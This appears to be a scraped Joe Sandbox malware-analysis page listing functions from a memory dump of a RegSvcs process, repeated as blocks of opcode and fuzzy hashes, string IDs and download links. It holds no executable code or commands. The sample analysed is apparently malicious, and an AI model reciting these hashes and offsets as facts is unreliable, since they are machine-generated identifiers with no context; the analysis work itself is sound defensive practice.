Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b7c18752e1a76facbcbb3a03ccb719dfa8eff43471ca42d6dbb72783dcaacf55
Instruction ID: 0a5f58dcda5253cddb69c550ded8c3ca7229bd52a94246e774c277227f92bd99
Opcode Fuzzy Hash: b7c18752e1a76facbcbb3a03ccb719dfa8eff43471ca42d6dbb72783dcaacf55
Instruction Fuzzy Hash: 4B817B31E042489FDB6ACF68D888BACBBF5FF45710F188469E955AF352D735A940CB10

Function 015E2A45 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

u)j, xrefs: 015E2C2D

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: u)j
API String ID: 0-1146774532
Opcode ID: 9792b7d1ff6b390477159f048da00badf365830914695c88672bbdb5e7077bb0
Instruction ID: cef8695b3304b12f4007956a31fafd1cd67a7f80af2c2243e40813a841f5287e
Opcode Fuzzy Hash: 9792b7d1ff6b390477159f048da00badf365830914695c88672bbdb5e7077bb0
Instruction Fuzzy Hash: 36512432E006159FEB2DCF59C8487BEBBF9FB44700F08445AE9069F285D375A812CBA0

Function 015CCCC8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

@, xrefs: 015CCD63

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: fef39ede660019f68b1d7ae0134226ebf4deba348a4a7d90ef04207c1a04ce97
Instruction ID: 7ceef339e06cab926148733a1bb4ba7f7cb8f1d9f9251bcf9f2ddce07e399d37
Opcode Fuzzy Hash: fef39ede660019f68b1d7ae0134226ebf4deba348a4a7d90ef04207c1a04ce97
Instruction Fuzzy Hash: DD5117765053529FC710DFA8C854A6BB7E8BF88B14F04092EFA89D7340E770DA04CBA2

Function 015CA580 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

(, xrefs: 015CA668

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 9102e1ba1fc381c9a68312379ed609d6bb3264b6fe5fc6724d8a4ef40ff51de1
Instruction ID: 6217dbe26780ccbb352276545f9f00b4ad663cde4fbba1f196f189bb3c73f098
Opcode Fuzzy Hash: 9102e1ba1fc381c9a68312379ed609d6bb3264b6fe5fc6724d8a4ef40ff51de1
Instruction Fuzzy Hash: 5B5115B0A1165ADFCB11CF99C880A8DBFF9FF58714F10822AE509AB641D7B4A941CF94

Function 015D2140 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(, xrefs: 015D2253

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 34e2ba80cd5caa1818bb20f99d23db833bf03d1233cf31147591b0b05cb8e398
Instruction ID: a54c07c32b8706a49219361363af8ef7df0a8560242e4983b5f854e81f67d8d0
Opcode Fuzzy Hash: 34e2ba80cd5caa1818bb20f99d23db833bf03d1233cf31147591b0b05cb8e398
Instruction Fuzzy Hash: 03511AB190161AAFCB11CF9DC88069DFBF0BF48724F50466EE918AB780D375A951CFA0

Function 015E28D0 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

twj, xrefs: 015E28FA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: twj
API String ID: 0-1637908201
Opcode ID: 9286f4c9e32b196d3500e471c78eb5920367e482dc0ea1f94f7477e67d45ef2d
Instruction ID: 80bbe88ec650b79acefd3b16022de435b616cf3849d794880e93c2c7eea43214
Opcode Fuzzy Hash: 9286f4c9e32b196d3500e471c78eb5920367e482dc0ea1f94f7477e67d45ef2d
Instruction Fuzzy Hash: C4519E71E00309ABEB25DB99CC58BAEBBBABFC0754F24401DD505AF288DB35A941CB54

Function 0160C6A6 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01648181, 016481F5

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: minkernel\ntdll\ldrredirect.c
API String ID: 0-3694840737
Opcode ID: fc3c171a0aa158fabbc8a42c3275b0698753c752c3373e44985f52a88fd57b5e
Instruction ID: ecc00595f1d75cca7eab0e2e89573a26ce74ab7abd34ace245a2292db2cd578f
Opcode Fuzzy Hash: fc3c171a0aa158fabbc8a42c3275b0698753c752c3373e44985f52a88fd57b5e
Instruction Fuzzy Hash: C831FF716447029FC324EA68DD86E2BBBA5BF94B10F05065CF981AB391E620EC04C7A2

Function 01654DD7 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 01654E06

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: minkernel\ntdll\ldrutil.c
API String ID: 0-4055692389
Opcode ID: e73c614137722f833c4bdde60ab8044e41803e0f9d9ea9b6962b2972528d8c54
Instruction ID: b163d6c932318700873e3ce56013cd2d1b2ded2aa89fa67c9116ba40808cc5e6
Opcode Fuzzy Hash: e73c614137722f833c4bdde60ab8044e41803e0f9d9ea9b6962b2972528d8c54
Instruction Fuzzy Hash: F4218E721481027FE3A49A6CDC89D767BADFF81A50F240148F911AE740DF50ED91D225

Function 015F8DBF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecb240598d65a9cf8a7f00c061f701473e360e5987b61bd93a3f6d42d281802
Instruction ID: 801fb7c5b9308454310a71be8445d8e1bdfebc0c09b2fa572365b57c0a5521db
Opcode Fuzzy Hash: fecb240598d65a9cf8a7f00c061f701473e360e5987b61bd93a3f6d42d281802
Instruction Fuzzy Hash: 0E225E70E0021ADFDB15CF99C8809BEFBF6BF84314B58845AEA559B241E734ED41CBA4

Function 015D28F0 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a79d261f5bf1fa704354fb49c9b1f10cd29fc9e38b8e19c529ba006642a16649
Instruction ID: 1c1ecfc8cb79fcc1a088bf1960ebf1f4fc0c1013243be43737a5808a19156462
Opcode Fuzzy Hash: a79d261f5bf1fa704354fb49c9b1f10cd29fc9e38b8e19c529ba006642a16649
Instruction Fuzzy Hash: B7F1AA716083429FE736CF2CC84476ABBE1BF88750F18892DE9858B391D775D885CB92

Function 015F4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc7f223a89905c55a10d9bd692523c34124fc1ad656d048a5470a2d6266029e
Instruction ID: e41cf60b1f53f8aa3e78547917bc1e8de6ee0b8d41c2d0d22b43139602c47ab1
Opcode Fuzzy Hash: ebc7f223a89905c55a10d9bd692523c34124fc1ad656d048a5470a2d6266029e
Instruction Fuzzy Hash: FDF13C71E0021A9BDB15CF99D980BAEBBF5BF88710F09856DEA05EB341E774D841CB60

Function 015DA9D0 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f22e750679352886fd87839c5e683c7a3ccc92ccd69bc1ddfda449931b36d2
Instruction ID: 3a9a097a116e6e5fe643da51e25e22041630e072e100346f9a7240e0a4cff2dc
Opcode Fuzzy Hash: 97f22e750679352886fd87839c5e683c7a3ccc92ccd69bc1ddfda449931b36d2
Instruction Fuzzy Hash: 37E14E71E00219AFEB22CF9DCD90BAEBBBABF84310F14452AE901EB351D7749941CB51

Function 015C8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671e91ffda30ce85864c2cca9a4867876f5fdbc984d7a6c4cf6c6f76f2a2ff37
Instruction ID: 04adcca6022f1fff4e1cf765e0e45e62b74f879e42b4361fec1e85c7074eb404
Opcode Fuzzy Hash: 671e91ffda30ce85864c2cca9a4867876f5fdbc984d7a6c4cf6c6f76f2a2ff37
Instruction Fuzzy Hash: D0D1B171A006269FDB24DFA8CC90ABEB7E5FF94B04F04462DE9169F280E734E955CB50

Function 015D65D0 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bde8800638aed2ee65b8e245e40ebfb452159fd4533a149b135651a22b35c8
Instruction ID: 8fe9862b214ba4f597c4a1d10ed6eab1b4854af0e45bfc10f4ce2743f03bcd91
Opcode Fuzzy Hash: a4bde8800638aed2ee65b8e245e40ebfb452159fd4533a149b135651a22b35c8
Instruction Fuzzy Hash: FBE17F71508342CFC725CF2CC590A6ABBE1FF89304F05896DE9958B351EB31E946CB92

Function 01658243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fc8e8e43da417eb9280bef980917e355e266e3dfe67b355ffa181fa1ff9558
Instruction ID: 7d20a0bdc503d1cb23830bc91a302f2f33eca050462f7636a908fab32064c0a7
Opcode Fuzzy Hash: 44fc8e8e43da417eb9280bef980917e355e266e3dfe67b355ffa181fa1ff9558
Instruction Fuzzy Hash: 85B18374A006059FDB64DF9ACD40AABBBBEBF84344F10845DAE4297B91DB34E906CB50

Function 015E0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd700fbd03bf2adbb2211fea5898c4dae515c14471c26ec91a7b73b47cf98cd
Instruction ID: 0a5ca3e9242c62c40f59508265bfe5645af5786e043cbcd9d8ee1b86eb43c968
Opcode Fuzzy Hash: 7fd700fbd03bf2adbb2211fea5898c4dae515c14471c26ec91a7b73b47cf98cd
Instruction Fuzzy Hash: D5B1E531B006469FDB19DBA8CC54BBEFBF6BF84200F284599E5529B385DB70D941CB90

Function 015F0DE1 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd30b233cab97d5f5577a25a1521e1db24ef8ad59da482e5c217528df29ac68
Instruction ID: 14da1a10f7e14c1b53ce912ddff4137e482c61d2d302a5b09849e83b6e75d757
Opcode Fuzzy Hash: 9cd30b233cab97d5f5577a25a1521e1db24ef8ad59da482e5c217528df29ac68
Instruction Fuzzy Hash: CCC12C70E0025ADFDB25DFE9C884AADBBB6FF84304F14412DE616AF286D771A941CB50

Function 015D83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b28a675a1c00110eed3b10fd2bc10905dc41bdaac1320f6196139718a9b9ef5
Instruction ID: 2308070ee60aa8d7f2470d4db91006fb8407e2efb574d0adfc729676e020996d
Opcode Fuzzy Hash: 6b28a675a1c00110eed3b10fd2bc10905dc41bdaac1320f6196139718a9b9ef5
Instruction Fuzzy Hash: F5C157741083419FD764CF19C884BAABBE5FF88304F44496DE9898B391E775E908CF92

Function 015CC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1118202f989b37affb4d13393f4b34c644fda00154cd13c1dbd9b3b62f3895a7
Instruction ID: 3f1aba1c37627a4c1e029ea93038aa2ffcc89c12decc01d9b508dbc5499cb2a3
Opcode Fuzzy Hash: 1118202f989b37affb4d13393f4b34c644fda00154cd13c1dbd9b3b62f3895a7
Instruction Fuzzy Hash: B6B16E70A006668FDB24DFA8C990BA9B3B5BF54700F0485EDD50EAB281EB749D85CF24

Function 01610185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b395fef7453d536b78dec007940be39c9c055d2e6198496586ed9f65ce9d980
